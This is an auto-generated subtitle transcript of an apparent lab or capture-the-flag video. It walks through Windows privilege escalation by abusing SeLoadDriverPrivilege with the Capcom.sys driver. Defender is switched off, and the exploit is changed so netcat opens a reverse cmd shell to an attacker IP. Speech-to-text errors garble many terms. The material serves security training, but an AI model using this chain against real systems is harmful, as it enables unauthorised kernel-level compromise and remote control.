1 00:00:00,210 --> 00:00:05,340 All right, so we've got this show in the box and we need to sort of assess our situation, we need 2 00:00:05,340 --> 00:00:06,360 to gain our bearings. 3 00:00:06,360 --> 00:00:10,140 We need to sort of figure out, you know, what is the attack surface of this machine? 4 00:00:10,140 --> 00:00:13,640 How can we vertically escalate our privileges? 5 00:00:14,130 --> 00:00:16,010 So there's a couple of things we can do, right. 6 00:00:16,100 --> 00:00:18,390 The first thing I like to do is just confirm my username. 7 00:00:19,770 --> 00:00:21,690 So my username is S.P.C.A. print. 8 00:00:22,590 --> 00:00:27,370 So I'm most likely a printer service running on the Fabric Corp domain. 9 00:00:27,630 --> 00:00:29,070 Well, what permissions do I have? 10 00:00:29,070 --> 00:00:33,690 What groups of my part of that user and then I type svc print. 11 00:00:34,770 --> 00:00:36,220 You can get a list of this right. 12 00:00:36,280 --> 00:00:41,460 So immediately we can see we have a local group membership to print operators in a global group, membership 13 00:00:41,460 --> 00:00:46,230 to domain users and it accounts we have no local administrative privileges on this box. 14 00:00:46,860 --> 00:00:47,240 Right. 15 00:00:47,250 --> 00:00:49,530 So we are not a privileged user. 16 00:00:49,800 --> 00:00:52,830 And if we just like net user, you can see a list of all the users on the machine. 17 00:00:53,040 --> 00:00:56,700 So we're not trying to horizontally escalate our privileges. 18 00:00:56,710 --> 00:00:58,110 In other words, we could do that. 19 00:00:58,110 --> 00:00:58,830 We could try that. 20 00:00:58,830 --> 00:01:03,360 We could, you know, see if there are credentials left on this box. 21 00:01:03,360 --> 00:01:09,900 You know, maybe there's a backup file located inside of this SBC Documents directory, or maybe there's 22 00:01:09,900 --> 00:01:12,600 a spreadsheet that contains credentials, maybe as toxin's potential. 23 00:01:12,870 --> 00:01:15,180 And maybe she's not an administrator, but we can log in as her. 24 00:01:15,180 --> 00:01:20,880 And then, you know, she has access to a SQL Server database, which we can then run XP Comanche against 25 00:01:20,880 --> 00:01:25,760 and then, you know, escalate to another user until we eventually arrive at an administrator. 26 00:01:26,220 --> 00:01:27,660 That's a possible vector. 27 00:01:28,050 --> 00:01:34,680 But an easier approach, a quicker approach is just to see what permissions this particular account 28 00:01:34,680 --> 00:01:34,890 has. 29 00:01:34,890 --> 00:01:35,170 So far. 30 00:01:35,170 --> 00:01:37,890 RadNet is who am I? 31 00:01:38,220 --> 00:01:38,640 Prev. 32 00:01:39,570 --> 00:01:46,530 I get a nice snapshot of the privileges for my particular account on this computer, which, by the 33 00:01:46,530 --> 00:01:47,610 way, is called Fuds. 34 00:01:48,030 --> 00:01:48,350 Right. 35 00:01:48,840 --> 00:01:49,510 So what can I do? 36 00:01:49,650 --> 00:01:51,530 Well, I have the AC machine account privilege. 37 00:01:51,570 --> 00:01:54,900 This means I can add workstations to the domain, what we do right. 38 00:01:55,200 --> 00:01:57,120 I mean, that's not really an exploitable attack vector. 39 00:01:57,120 --> 00:02:04,890 So we're going to move on the next one with Celo driver privilege load and unload device drivers enabled. 40 00:02:06,540 --> 00:02:08,820 OK, so this should have your ears perked up a little bit. 41 00:02:09,130 --> 00:02:11,430 You might not know how to exploit this, but just think about this. 42 00:02:11,430 --> 00:02:12,090 What it's saying. 43 00:02:13,680 --> 00:02:20,250 It's saying that my particular account that I'm running as SBC prince on this particular system I use 44 00:02:21,720 --> 00:02:26,280 can load drivers on the system. 45 00:02:27,420 --> 00:02:30,210 So perhaps I can load a malicious driver, right. 46 00:02:30,420 --> 00:02:32,520 I mean, I can dynamically load device drivers. 47 00:02:33,090 --> 00:02:42,780 So essentially I can execute code in kernel space and that could be our path toward victory. 48 00:02:42,990 --> 00:02:43,380 Right. 49 00:02:43,590 --> 00:02:48,930 So let's go ahead and Google this to see if there's a way to find a path here. 50 00:02:48,960 --> 00:02:56,340 So let's just go ahead and open up the Web browser and we're going to type in silo driver privilege. 51 00:02:56,340 --> 00:02:57,450 Just copy that to a clipboard. 52 00:02:58,230 --> 00:02:58,710 I grab it. 53 00:02:59,850 --> 00:03:00,720 So we're in Google. 54 00:03:01,110 --> 00:03:03,960 We're not seeing them, as you can see, in the upper right corner. 55 00:03:03,960 --> 00:03:06,510 And we're just going to go ahead and type like that. 56 00:03:06,780 --> 00:03:09,330 And immediately we see the privacy escalation autocomplete. 57 00:03:09,330 --> 00:03:09,510 Right. 58 00:03:09,510 --> 00:03:12,420 So Google is telling us it's basically reading our minds. 59 00:03:12,420 --> 00:03:17,700 It knows that this is what we want to do based on the search engine optimization for this phrase. 60 00:03:18,270 --> 00:03:20,820 I'm not signing so that it's not pulling this from my search history. 61 00:03:24,160 --> 00:03:28,990 And let's see, we've got something here, S.E., abusing as helo driver privilege, so this is an excellent 62 00:03:28,990 --> 00:03:31,120 article by the folks at Htar Logic. 63 00:03:31,130 --> 00:03:34,390 I behoove you to read this. 64 00:03:34,960 --> 00:03:36,760 There's a lot of valuable information here. 65 00:03:37,810 --> 00:03:40,870 And so you want to know how this particular exploit works. 66 00:03:40,870 --> 00:03:45,700 You don't just want to execute scripts because then you would be a script kiddie, which is what we're 67 00:03:45,700 --> 00:03:49,590 trying to avoid that designation, essentially. 68 00:03:50,350 --> 00:03:53,380 So let's see what we can do here. 69 00:03:54,460 --> 00:03:58,590 And what I'm doing is I'm just looking for the p.l.c. and you can see here Europos Driver. 70 00:03:58,600 --> 00:03:59,740 So let's go ahead and control. 71 00:03:59,740 --> 00:04:03,540 Click that to Oprah Dupain and say this is a QP file. 72 00:04:03,730 --> 00:04:04,900 So it's a C++ file. 73 00:04:05,950 --> 00:04:07,620 Now, we could there's a couple of options, right. 74 00:04:07,630 --> 00:04:11,800 We could try to build this exploit on our local attacking system. 75 00:04:11,800 --> 00:04:14,340 But it's a Linux box and we're trying to exploit a Windows machine. 76 00:04:14,860 --> 00:04:17,500 So typically, in my experience, it makes more sense. 77 00:04:17,500 --> 00:04:23,280 You have less problems and errors if you just build the exploit on the target of the target machine's 78 00:04:23,290 --> 00:04:27,540 operating system, it's just the easiest path to exploitation. 79 00:04:27,550 --> 00:04:30,350 So we're going to go ahead and set that up. 80 00:04:30,370 --> 00:04:33,400 Let's go ahead and fire up our windows box and see if we can do here. 81 00:04:33,670 --> 00:04:36,460 So let's see what to escape. 82 00:04:36,460 --> 00:04:38,350 Windows 10 as up this puppy. 83 00:04:41,730 --> 00:04:43,610 So here we are in our Windows box. 84 00:04:44,580 --> 00:04:53,150 Let's go ahead and open up chrome dragged this down here like having everything in one place, OK? 85 00:04:54,000 --> 00:04:55,400 You know, everybody's OCD in some way. 86 00:04:55,410 --> 00:04:56,130 That's my OCD. 87 00:04:56,140 --> 00:04:59,850 I like to have all my little icons down there and delete this one from the desktop. 88 00:05:07,720 --> 00:05:18,340 All right, so here we are and Google, and let's just go ahead and type that, S.E., S.E., load driver 89 00:05:18,970 --> 00:05:19,660 privilege. 90 00:05:24,460 --> 00:05:26,020 We've got the Tara logic post. 91 00:05:28,560 --> 00:05:34,230 Skip down to exploitation and let's see if we can find out how to actually run this 92 00:05:37,020 --> 00:05:39,690 control, click this guy and I saw something else here. 93 00:05:41,030 --> 00:05:45,720 You go down a little bit so you can see this basically a bunch of different parts to this. 94 00:05:45,720 --> 00:05:45,980 Right. 95 00:05:46,380 --> 00:05:48,930 So I don't know how to describe this. 96 00:05:48,930 --> 00:05:50,520 So it's actually three parts to this exploit. 97 00:05:51,960 --> 00:05:55,050 It's not just one thing that you compile and click. 98 00:05:55,710 --> 00:05:58,980 So first you have to load a vulnerable. 99 00:05:59,400 --> 00:06:09,630 Microsoft signed Binary in to the registry and that's what this EOP a load driver project does. 100 00:06:09,750 --> 00:06:16,800 OK, and we're going to use Capcom that says because it allows a user and process to execute internal 101 00:06:16,800 --> 00:06:17,220 space. 102 00:06:17,640 --> 00:06:24,720 And that's the vulnerability that we're going to exploit to once you once you have the driver loaded. 103 00:06:24,940 --> 00:06:33,140 I need to exploit it and we can use this tool here to exploit Capcom. 104 00:06:33,990 --> 00:06:38,220 And essentially what we can do is we can go to the source, we can tell it what executable we want to 105 00:06:38,220 --> 00:06:45,320 load with system permissions based on the honorable driver load of a memory. 106 00:06:45,960 --> 00:06:52,410 And this is where we're going to go ahead and use Ngarkat to shovel the shell from the victim to our 107 00:06:53,010 --> 00:06:53,910 next attacker box. 108 00:06:54,330 --> 00:06:58,320 But there's some modifications we need to do to the code and we're going to work. 109 00:06:58,320 --> 00:06:59,880 I'm going to walk it through that step by step. 110 00:06:59,880 --> 00:07:06,450 So we actually also need the Capcom that this file, which if you go back to the tragic thing, it tells 111 00:07:06,450 --> 00:07:10,860 you, you know, the hash for it, but they don't actually give you the file. 112 00:07:10,860 --> 00:07:16,080 And I guess that's because they don't want to make it easy or too convenient for attackers to to take 113 00:07:16,080 --> 00:07:18,420 the next step of compromising the host using this exploit. 114 00:07:19,470 --> 00:07:25,860 But we can actually find stuff which is type like Capcom that says I think it's like Capcom that says 115 00:07:25,860 --> 00:07:26,790 for the security. 116 00:07:26,790 --> 00:07:30,300 Those are the guys that actually publish this. 117 00:07:31,440 --> 00:07:31,650 Yeah. 118 00:07:31,710 --> 00:07:32,970 See for the security Capcom. 119 00:07:35,990 --> 00:07:37,590 Here it is for the security get up. 120 00:07:38,270 --> 00:07:41,960 Here we go, for the security capcom GitHub. 121 00:07:44,220 --> 00:07:45,770 See, it's the driver. 122 00:07:50,210 --> 00:07:53,900 Now, one thing we're going to have to do is disable Windows Defender, because it's going to immediately 123 00:07:53,900 --> 00:07:59,220 catch this dishonorable driving when we try to download it, smart screen is going to kill it. 124 00:07:59,240 --> 00:08:00,290 Windows Defender is going to kill it. 125 00:08:00,290 --> 00:08:01,250 We can't just download it. 126 00:08:02,930 --> 00:08:04,330 It's not quite that simple. 127 00:08:05,840 --> 00:08:06,950 So disable defender. 128 00:08:18,430 --> 00:08:21,280 Many settings that disable all of the stuff. 129 00:08:28,540 --> 00:08:33,230 Real time protection off cloud delivered protection of automatic sample submission. 130 00:08:34,580 --> 00:08:41,250 All right, let's just make this box naked because we need to do our testing here. 131 00:08:41,930 --> 00:08:42,290 All right. 132 00:08:42,980 --> 00:08:43,610 Good to go. 133 00:08:44,540 --> 00:08:45,530 It's going to download. 134 00:08:50,180 --> 00:08:53,210 Saying this file can harm our computer, so even Chrome is trying to stop us. 135 00:08:53,310 --> 00:08:54,680 All right, we're going to go ahead and keep it. 136 00:08:55,430 --> 00:08:57,410 Hopefully it will honor our request. 137 00:08:58,310 --> 00:09:00,020 And then let's go out and download these other files. 138 00:09:07,320 --> 00:09:08,270 What is it? 139 00:09:14,970 --> 00:09:20,970 And we'll download this zip as well, this is the concept for abusing the Cee Lo driver privilege. 140 00:09:25,820 --> 00:09:28,430 All right, so apparently we've got everything I'm going to close out of Chrome. 141 00:09:31,760 --> 00:09:33,140 See if we can find our downloads. 142 00:09:37,340 --> 00:09:38,120 Extract everything. 143 00:09:40,660 --> 00:09:41,500 Extractable. 144 00:09:54,690 --> 00:09:55,380 Extractable. 145 00:10:28,280 --> 00:10:34,950 Delete everything that we don't need and just control clicking all the stuff that we don't care about. 146 00:10:38,520 --> 00:10:43,440 All right, so let's see, we've got this low driver, we've got this master, what is the mode driver? 147 00:10:45,600 --> 00:10:49,920 We have a raw C++ file, so let's go ahead and open a new visual studio project and just dump this in 148 00:10:49,920 --> 00:10:50,180 there. 149 00:10:52,540 --> 00:10:58,150 Visual Studio twenty nineteen and by the way, Visual Studio is free, I'm using the community edition. 150 00:10:58,150 --> 00:11:02,740 Anyone can download it just by Googling Visual Studio and you'll have it there. 151 00:11:03,070 --> 00:11:04,770 There's a section there where you can install it. 152 00:11:06,250 --> 00:11:07,380 So we've got Visual Studio. 153 00:11:07,390 --> 00:11:09,340 Let's go ahead and create a new project. 154 00:11:11,620 --> 00:11:12,280 And what do we want? 155 00:11:12,310 --> 00:11:13,550 We don't want all languages, right? 156 00:11:13,570 --> 00:11:16,990 We just want C++ because it was a dot CPP extension. 157 00:11:17,710 --> 00:11:18,580 We want to console that. 158 00:11:18,640 --> 00:11:18,790 Right. 159 00:11:18,820 --> 00:11:20,960 We just wanted to run in the Windows terminal. 160 00:11:20,990 --> 00:11:23,980 You know, we don't want anything fancy here or platforms. 161 00:11:23,980 --> 00:11:24,340 Nope. 162 00:11:24,580 --> 00:11:28,600 Just windows and of other types. 163 00:11:29,780 --> 00:11:31,660 No, let's just do Kosal. 164 00:11:34,890 --> 00:11:36,930 That's Cricket Council up next. 165 00:11:39,230 --> 00:11:47,510 And let's just name it EOP Load Driver, it's going to put it in this folder right here. 166 00:11:49,400 --> 00:11:50,390 Copy that to the clipboard. 167 00:11:50,600 --> 00:11:52,780 I'm going to place the solution in the project in the same directory. 168 00:11:52,790 --> 00:11:54,410 Just makes it a little bit easier to find things 169 00:11:57,110 --> 00:11:57,830 while that loads. 170 00:11:57,830 --> 00:12:03,350 I'm going to go ahead pop a new explorer process that has the path. 171 00:12:04,960 --> 00:12:05,900 So I'm just thinking ahead. 172 00:12:09,220 --> 00:12:09,610 All right. 173 00:12:11,110 --> 00:12:18,010 Let's go back to the studio that looks good, looks like it's still trying to create the project of 174 00:12:18,040 --> 00:12:19,200 the image running really slowly. 175 00:12:19,210 --> 00:12:23,620 I don't know why you may not notice that through the recording, because I did a lot of editing so that 176 00:12:23,620 --> 00:12:24,880 you don't have to suffer like I have been. 177 00:12:26,320 --> 00:12:27,310 But sometimes that happens, right? 178 00:12:27,310 --> 00:12:28,740 Sometimes your virtual machine just sucks. 179 00:12:28,750 --> 00:12:33,520 You know, I've already tried mopping up the memory and the CPU and for some reason it's still crippling 180 00:12:33,520 --> 00:12:37,410 my it's just running at like 100 percent constantly, which is kind of annoying. 181 00:12:39,670 --> 00:12:47,080 Here we go, everything nice and loaded, EOP low, that CBP source files and we should see the zip 182 00:12:47,080 --> 00:12:47,590 file here. 183 00:12:47,710 --> 00:12:48,040 We do. 184 00:12:48,220 --> 00:12:49,300 Right there it is. 185 00:12:50,320 --> 00:12:51,470 So what do we want to do? 186 00:12:52,240 --> 00:12:53,550 This is obviously not what we want to do. 187 00:12:53,560 --> 00:12:54,700 We don't want to print Hello World. 188 00:12:55,240 --> 00:12:56,050 So let's copy. 189 00:12:57,850 --> 00:13:03,880 And the contents of the driver into their right, so I wonder if I could just drag and drop this and 190 00:13:03,880 --> 00:13:04,360 like this. 191 00:13:06,940 --> 00:13:11,050 OK, OK, so let's just do a little X. 192 00:13:12,710 --> 00:13:13,460 To cut that. 193 00:13:19,940 --> 00:13:23,030 Control and tweet, Jova paste. 194 00:13:23,930 --> 00:13:25,940 All right, so we've got our three lines of code in here. 195 00:13:28,090 --> 00:13:37,970 And we can see, you know, what this is doing, this looks like this was written by Oscar Meyer and 196 00:13:38,410 --> 00:13:39,400 what we have. 197 00:13:44,690 --> 00:13:47,150 So it's good to just, you know, just to give the code a quick glance. 198 00:13:47,180 --> 00:13:50,960 I mean, not that we don't trust our logic, but we just want to make sure that we're not going to introduce 199 00:13:50,960 --> 00:13:55,190 any kind of security holes into our our system. 200 00:13:57,320 --> 00:13:59,480 That's unexpected at the outside of our knowledge. 201 00:13:59,480 --> 00:14:04,130 So everything in here looks really good and even tells you how you can run this tool. 202 00:14:04,530 --> 00:14:04,790 Right. 203 00:14:04,850 --> 00:14:08,960 So you can type the driver name and then you need to give it a register so we can create this we can 204 00:14:08,960 --> 00:14:11,000 call this VONNE or whatever you want your name. 205 00:14:12,290 --> 00:14:16,370 And they were just going to basically give it the fully the full path to the driver, which is actually 206 00:14:16,370 --> 00:14:18,530 called Capcom Cap Composites. 207 00:14:19,850 --> 00:14:24,920 So compilers, we don't want to compile it in debug, we want to compile it for release and we're running 208 00:14:24,920 --> 00:14:26,630 up against a 64 bit system. 209 00:14:28,280 --> 00:14:33,260 So we're going to go ahead and say x 64 and then we're going to build it. 210 00:14:35,710 --> 00:14:43,000 Build solution, hopefully we don't get any errors, or if we do get errors, hopefully we know how 211 00:14:43,000 --> 00:14:47,480 to fix it and usually we can fix them pretty easily just by Googling around or thinking things through. 212 00:14:49,780 --> 00:14:51,760 You can see the build process happening right here. 213 00:14:51,760 --> 00:15:00,970 It felt in our open source, postdebate eFax such directory. 214 00:15:03,610 --> 00:15:07,360 So, you know, this is the only file included with quotes and not brackets. 215 00:15:08,050 --> 00:15:12,650 So I bet this tool is looking for this file in the local directory, which is a president. 216 00:15:12,670 --> 00:15:13,420 It will compile. 217 00:15:14,530 --> 00:15:15,790 The question is, do we need this? 218 00:15:16,300 --> 00:15:19,870 And I don't know if we do, but just comment it out. 219 00:15:21,520 --> 00:15:26,050 It's going to put forward in front of it and see if we can rebuild it without it. 220 00:15:28,960 --> 00:15:31,190 I think this is like a generic C++ file. 221 00:15:31,210 --> 00:15:31,960 We might not need it. 222 00:15:36,400 --> 00:15:39,110 All right, build one succeeded, zero failed. 223 00:15:39,160 --> 00:15:41,170 I love to see that. 224 00:15:42,010 --> 00:15:43,080 OK, so where are we? 225 00:15:43,180 --> 00:15:45,940 We are in this folder right here, Skrappy's Path. 226 00:15:49,440 --> 00:15:50,640 Right, quick copy. 227 00:15:57,420 --> 00:16:02,640 And here we go, you see the timestamp matches just a minute ago, so I'm going to right click this, 228 00:16:02,700 --> 00:16:06,580 I'm going to copy it and I put this in the download folder. 229 00:16:07,020 --> 00:16:07,320 All right. 230 00:16:07,320 --> 00:16:09,640 So now let's look at this exploit Capcom Master. 231 00:16:10,560 --> 00:16:10,800 All right. 232 00:16:10,800 --> 00:16:12,470 So we have a Visual Studio Solutions file. 233 00:16:12,810 --> 00:16:13,560 It's going to open that. 234 00:16:14,520 --> 00:16:17,100 So you should only open products from a trustworthy source. 235 00:16:17,620 --> 00:16:18,730 Would you like to open this project? 236 00:16:18,750 --> 00:16:19,170 I would. 237 00:16:19,530 --> 00:16:21,110 I'm glad the visual studio warns me that. 238 00:16:21,120 --> 00:16:21,840 That's nice of them. 239 00:16:23,660 --> 00:16:25,520 The project is loaded and ready to use. 240 00:16:25,760 --> 00:16:33,330 All right, you might say, well, where's the project if it doesn't load for you? 241 00:16:33,350 --> 00:16:38,040 We can always load it in the solutions explorer on the right side of the screen, quick little flip 242 00:16:38,040 --> 00:16:42,800 the arrow, go down to source files and then double click the value on notice. 243 00:16:42,800 --> 00:16:47,220 Here you see the steady, steady state ethics file is here. 244 00:16:48,440 --> 00:16:51,440 So that's probably why the other one didn't compile because it was simply missing that file. 245 00:16:52,760 --> 00:16:53,750 All right, here we go. 246 00:16:53,840 --> 00:16:55,670 Exploit Capcom. 247 00:16:57,410 --> 00:17:00,260 Go and scroll down here and see if there's anything we need to modify. 248 00:17:01,550 --> 00:17:03,680 So I'm just reading through the comments, right. 249 00:17:03,950 --> 00:17:07,180 Representing way out of in buffer for the vulnerable elektro. 250 00:17:07,430 --> 00:17:13,040 We don't really need to know the details of how this works, but we need to know what's here. 251 00:17:14,000 --> 00:17:19,670 Now, here it says Capcom does this exploit and the secret file failed. 252 00:17:20,680 --> 00:17:23,680 So it's kind of see how to get into this condition. 253 00:17:25,040 --> 00:17:26,120 We don't need to worry about that yet. 254 00:17:26,820 --> 00:17:28,220 Only if it fails, then we need to look there. 255 00:17:30,610 --> 00:17:35,170 OK, this is what I'm interested in, Launch Shall Watch launches a command show, and you can see here 256 00:17:35,170 --> 00:17:39,160 it's just going to launch seemed to be a system. 257 00:17:39,940 --> 00:17:40,690 We don't want to do that. 258 00:17:40,690 --> 00:17:40,830 Right. 259 00:17:40,840 --> 00:17:42,780 We want it to kick back reversal to us. 260 00:17:43,630 --> 00:17:48,580 So let's see how this is what's happening here, this string. 261 00:17:50,810 --> 00:17:59,840 It's being saved, too, it looks like a character array called command line, which is then being used 262 00:17:59,840 --> 00:18:01,960 or passes create process function. 263 00:18:01,970 --> 00:18:03,830 So let's see if we can Google create process. 264 00:18:06,490 --> 00:18:10,990 I'm seeing great process as the first hit on the Microsoft Web page, so let's go and click there. 265 00:18:11,020 --> 00:18:15,220 That's probably the documentation that will give us the syntax of how to use this function. 266 00:18:17,260 --> 00:18:18,160 Yeah, this is what we want. 267 00:18:18,170 --> 00:18:18,850 See the syntax. 268 00:18:19,600 --> 00:18:26,460 And you can see here, it's like we're passing it with a nine, nine parameters, ten, ten. 269 00:18:26,920 --> 00:18:29,130 The first thing we pass in is the application name. 270 00:18:30,820 --> 00:18:32,470 And let's see, it actually tells us what that is. 271 00:18:32,720 --> 00:18:39,670 OK, so in this case, the application is completely and we probably won't see indeed to launch Netscape 272 00:18:40,270 --> 00:18:44,410 so we can upload Ngarkat to the victim and then have and execute it and see if we can figure out how 273 00:18:44,410 --> 00:18:44,830 to do that. 274 00:18:45,310 --> 00:18:48,280 Second parameter is a command line. 275 00:18:49,240 --> 00:18:52,810 So the application comes first, then comes the command line command line to be executed. 276 00:18:52,950 --> 00:18:53,440 All right. 277 00:18:54,940 --> 00:19:01,690 So here you see they're actually passing ACMD as the application and the command line. 278 00:19:03,160 --> 00:19:03,950 That's going to change that. 279 00:19:04,390 --> 00:19:08,590 So we're going to do another teacher argument. 280 00:19:11,260 --> 00:19:16,140 It's going to be the argument we're going to use, we're going to pass to see immediately I'm going 281 00:19:16,150 --> 00:19:18,550 to say, Fortunati, why am I doing that? 282 00:19:19,000 --> 00:19:24,190 Because let me show you real quick, if I open up the command line. 283 00:19:27,030 --> 00:19:32,460 I type who am I, it tells me my username and my workstation hostname, right? 284 00:19:34,670 --> 00:19:39,290 But if I type seemed like folks I see, who am I? 285 00:19:41,450 --> 00:19:43,610 Does the same thing and what's happening here? 286 00:19:44,060 --> 00:19:52,100 He seemed to accept folks like Questionmark for Tallassee carries out the command specified by the string 287 00:19:52,100 --> 00:19:52,880 and then terminates. 288 00:19:53,120 --> 00:19:53,410 Right. 289 00:19:54,500 --> 00:20:00,140 So we want seemed to carry out Ngarkat and the terminate. 290 00:20:00,800 --> 00:20:05,250 We want to send us the shell and then die so we can say and see Daddy. 291 00:20:07,040 --> 00:20:09,530 And what's the syntax for Neko Case? 292 00:20:09,560 --> 00:20:10,130 We didn't know. 293 00:20:10,710 --> 00:20:16,910 Can go back to our Kalay box, split the screen for us to use pseudo locate. 294 00:20:16,980 --> 00:20:18,830 Ngarkat indicates crazy. 295 00:20:21,500 --> 00:20:22,040 Got here. 296 00:20:25,790 --> 00:20:30,080 You know, copy this to our current directory structure. 297 00:20:30,080 --> 00:20:30,560 We have it. 298 00:20:30,740 --> 00:20:31,190 We do. 299 00:20:31,970 --> 00:20:34,490 And if we do, we can't do this. 300 00:20:34,490 --> 00:20:37,680 But if we do this, we say C minus H. 301 00:20:37,750 --> 00:20:41,300 This is the latest version of that cat, which is similar to the Windows P version. 302 00:20:41,990 --> 00:20:45,470 This is the Windows version in the Linux version. 303 00:20:46,190 --> 00:20:51,810 But we want to do we want to see Ngarkat Mean what the victim to connect back to us. 304 00:20:51,810 --> 00:20:53,960 I say Ngarkat options. 305 00:20:53,960 --> 00:20:54,840 What options do we want? 306 00:20:55,520 --> 00:21:01,250 We want to send a shuttle program to exec after Canek. 307 00:21:01,400 --> 00:21:02,180 Dangerous, right? 308 00:21:02,180 --> 00:21:02,870 That's what we want. 309 00:21:02,870 --> 00:21:07,580 We want it to send Dashi seemed to back to us. 310 00:21:08,000 --> 00:21:11,450 How do we specify us pickle's here hostname. 311 00:21:11,600 --> 00:21:13,040 Which would be our tacker IP. 312 00:21:16,250 --> 00:21:16,550 Right. 313 00:21:17,770 --> 00:21:19,790 Ten, ten, ten for twelve. 314 00:21:19,790 --> 00:21:21,320 And then a port that we're listening on. 315 00:21:21,770 --> 00:21:28,040 We can listen on Port nine thousand one to its code and put that into our code to the ten fourteen twelve 316 00:21:28,250 --> 00:21:30,920 nine thousand one and we'll send back immediately. 317 00:21:32,390 --> 00:21:40,430 Then what we'll do is when we pass we'll pass this to, we create process function right here. 318 00:21:40,910 --> 00:21:47,690 So we'll say argument like so and then these other variables. 319 00:21:47,690 --> 00:21:48,960 No point, no point. 320 00:21:49,100 --> 00:21:51,680 Faults create new console. 321 00:21:51,980 --> 00:21:55,130 No no pointer, no pointer start info processing. 322 00:21:55,130 --> 00:21:56,750 Oh we can leave this as a default. 323 00:21:57,440 --> 00:21:59,780 The reason I know that's because I've already read through this. 324 00:22:00,050 --> 00:22:00,370 Right. 325 00:22:01,700 --> 00:22:06,920 And I can see that all this other information now it's fine if we leave everything else the way it is. 326 00:22:08,480 --> 00:22:09,590 So it's going closer to chrome. 327 00:22:12,020 --> 00:22:12,620 That looks good. 328 00:22:13,820 --> 00:22:16,610 Change this to really sixty four. 329 00:22:16,610 --> 00:22:17,120 That's good. 330 00:22:17,120 --> 00:22:18,230 And let's just build this puppy. 331 00:22:18,530 --> 00:22:19,720 I really can't wait to get off this one. 332 00:22:19,790 --> 00:22:21,760 Box Windows box. 333 00:22:21,950 --> 00:22:22,530 It's so slow. 334 00:22:23,370 --> 00:22:24,530 I've got an error message. 335 00:22:24,540 --> 00:22:29,960 Syntex looks like we forgot a semicolon and I can see that right here. 336 00:22:30,740 --> 00:22:31,880 That should do the trick. 337 00:22:31,910 --> 00:22:33,320 Notice how a semicolon exists here. 338 00:22:34,100 --> 00:22:35,210 You need to also have one here. 339 00:22:37,310 --> 00:22:39,380 Build, build solution. 340 00:22:40,310 --> 00:22:40,580 Right. 341 00:22:40,580 --> 00:22:41,420 So it's exceeded. 342 00:22:42,350 --> 00:22:43,310 That is good news. 343 00:22:43,310 --> 00:22:49,520 Let's go ahead and grab this file and copy it and put it in our download folder. 344 00:22:49,550 --> 00:22:51,470 We're going to send everything over to our attacker machine. 345 00:22:51,470 --> 00:22:53,900 The S&P is the easiest way I found it. 346 00:22:53,900 --> 00:22:54,830 Just move stuff around. 347 00:22:58,120 --> 00:22:58,870 All right, sweet. 348 00:22:59,530 --> 00:23:02,950 So now let's go to our Kelly Box and let's set up a file share. 349 00:23:05,210 --> 00:23:11,370 Clear, it's in this folder suite and let's see what can we do? 350 00:23:11,390 --> 00:23:16,370 Let's go ahead and do zero impact server. 351 00:23:19,100 --> 00:23:19,910 Assembly server. 352 00:23:20,330 --> 00:23:20,810 Yes. 353 00:23:21,220 --> 00:23:21,480 All right. 354 00:23:21,510 --> 00:23:28,820 So what we can do is we see the impact S&P server will use SMB to support because Windows 10 like this, 355 00:23:29,100 --> 00:23:33,510 if you don't have it sometimes it doesn't connect because it considers it a vulnerability assessment 356 00:23:33,530 --> 00:23:33,880 team, is it? 357 00:23:34,310 --> 00:23:36,110 I support it from the file share. 358 00:23:37,640 --> 00:23:39,500 And you also need to put a username and password. 359 00:23:40,400 --> 00:23:49,630 So username or to say vonne password and then what we need next as a share name and a share path to 360 00:23:49,660 --> 00:23:50,000 your name. 361 00:23:50,450 --> 00:23:53,120 It's called Exploits Path Current Directory 362 00:23:55,850 --> 00:23:56,920 and something happened. 363 00:23:57,900 --> 00:24:01,230 I think it's because I put two back takes instead of one to text. 364 00:24:01,340 --> 00:24:02,870 So let's go ahead control. 365 00:24:02,870 --> 00:24:04,820 Right, right to left, right, control. 366 00:24:04,820 --> 00:24:05,210 Left, right. 367 00:24:05,210 --> 00:24:08,120 This gets me through the primaries when we're at a time. 368 00:24:08,690 --> 00:24:10,940 I think a shortcut now. 369 00:24:10,940 --> 00:24:12,770 Of course, we need our IP address. 370 00:24:15,110 --> 00:24:18,410 Krepp it is there Ethernet adapter. 371 00:24:18,650 --> 00:24:23,150 So Tintern are one entity 168, 38, 128. 372 00:24:27,410 --> 00:24:28,990 Let's see if we can connect to this. 373 00:24:45,980 --> 00:24:54,020 Twenty one, sixty eight thirty eight, one twenty eight exploits should prompt me for credentials. 374 00:24:54,020 --> 00:24:56,390 Hopefully it does yeah. 375 00:25:01,110 --> 00:25:03,680 Make sure I put the password in correctly, right? 376 00:25:04,440 --> 00:25:05,580 Remember my credentials. 377 00:25:06,330 --> 00:25:09,770 OK, we should see the route. 378 00:25:09,780 --> 00:25:12,210 We should just see NCDC and we do. 379 00:25:12,750 --> 00:25:17,340 So Skrappy's files, drag them over. 380 00:25:19,380 --> 00:25:19,680 All right. 381 00:25:19,680 --> 00:25:22,680 And let's go back to our Tucker box and make sure that we got everything we needed. 382 00:25:26,870 --> 00:25:27,180 Yep. 383 00:25:28,700 --> 00:25:36,170 All right, so this this is interesting, this is a in alternate data stream, A.D.s that included inside 384 00:25:36,170 --> 00:25:41,090 of files are downloaded from the Internet, and that's how your Web browser and Windows defender knows 385 00:25:41,750 --> 00:25:43,130 that a file might not be safe. 386 00:25:43,130 --> 00:25:46,850 And that's part of the reason why we got hit as part of the reason why Chrome actually 387 00:25:49,670 --> 00:25:51,920 why Chrome complained when we tried to download this. 388 00:25:51,980 --> 00:25:56,240 For example, if I go cat capcom, that's this I identifier. 389 00:25:56,260 --> 00:26:03,020 If I can see here, it's actually showing you that it came from this location and 083 means the Internet. 390 00:26:03,500 --> 00:26:05,350 This is also a data stream that got passed out. 391 00:26:05,360 --> 00:26:08,800 So that is actually really, really cool that we can see that. 392 00:26:09,410 --> 00:26:11,110 But let's not get too bogged down here. 393 00:26:11,120 --> 00:26:14,270 Let's upload all these things to our computer target. 394 00:26:14,690 --> 00:26:16,280 Now, where do we want to upload it? 395 00:26:17,090 --> 00:26:23,840 Let's go to the root directory, because it really depends on it's really important to learn where to 396 00:26:23,840 --> 00:26:24,500 upload things. 397 00:26:24,500 --> 00:26:24,690 Right. 398 00:26:24,710 --> 00:26:25,430 There's a test folder. 399 00:26:25,430 --> 00:26:31,910 I see if we can upload it there, but we might not have execution privileges on all these these folders. 400 00:26:34,070 --> 00:26:42,140 I'm kind of more inclined to use this universal print driver folder because we are a printer service 401 00:26:42,140 --> 00:26:42,530 account. 402 00:26:43,250 --> 00:26:45,530 So we should have rights to write to this folder here. 403 00:26:46,910 --> 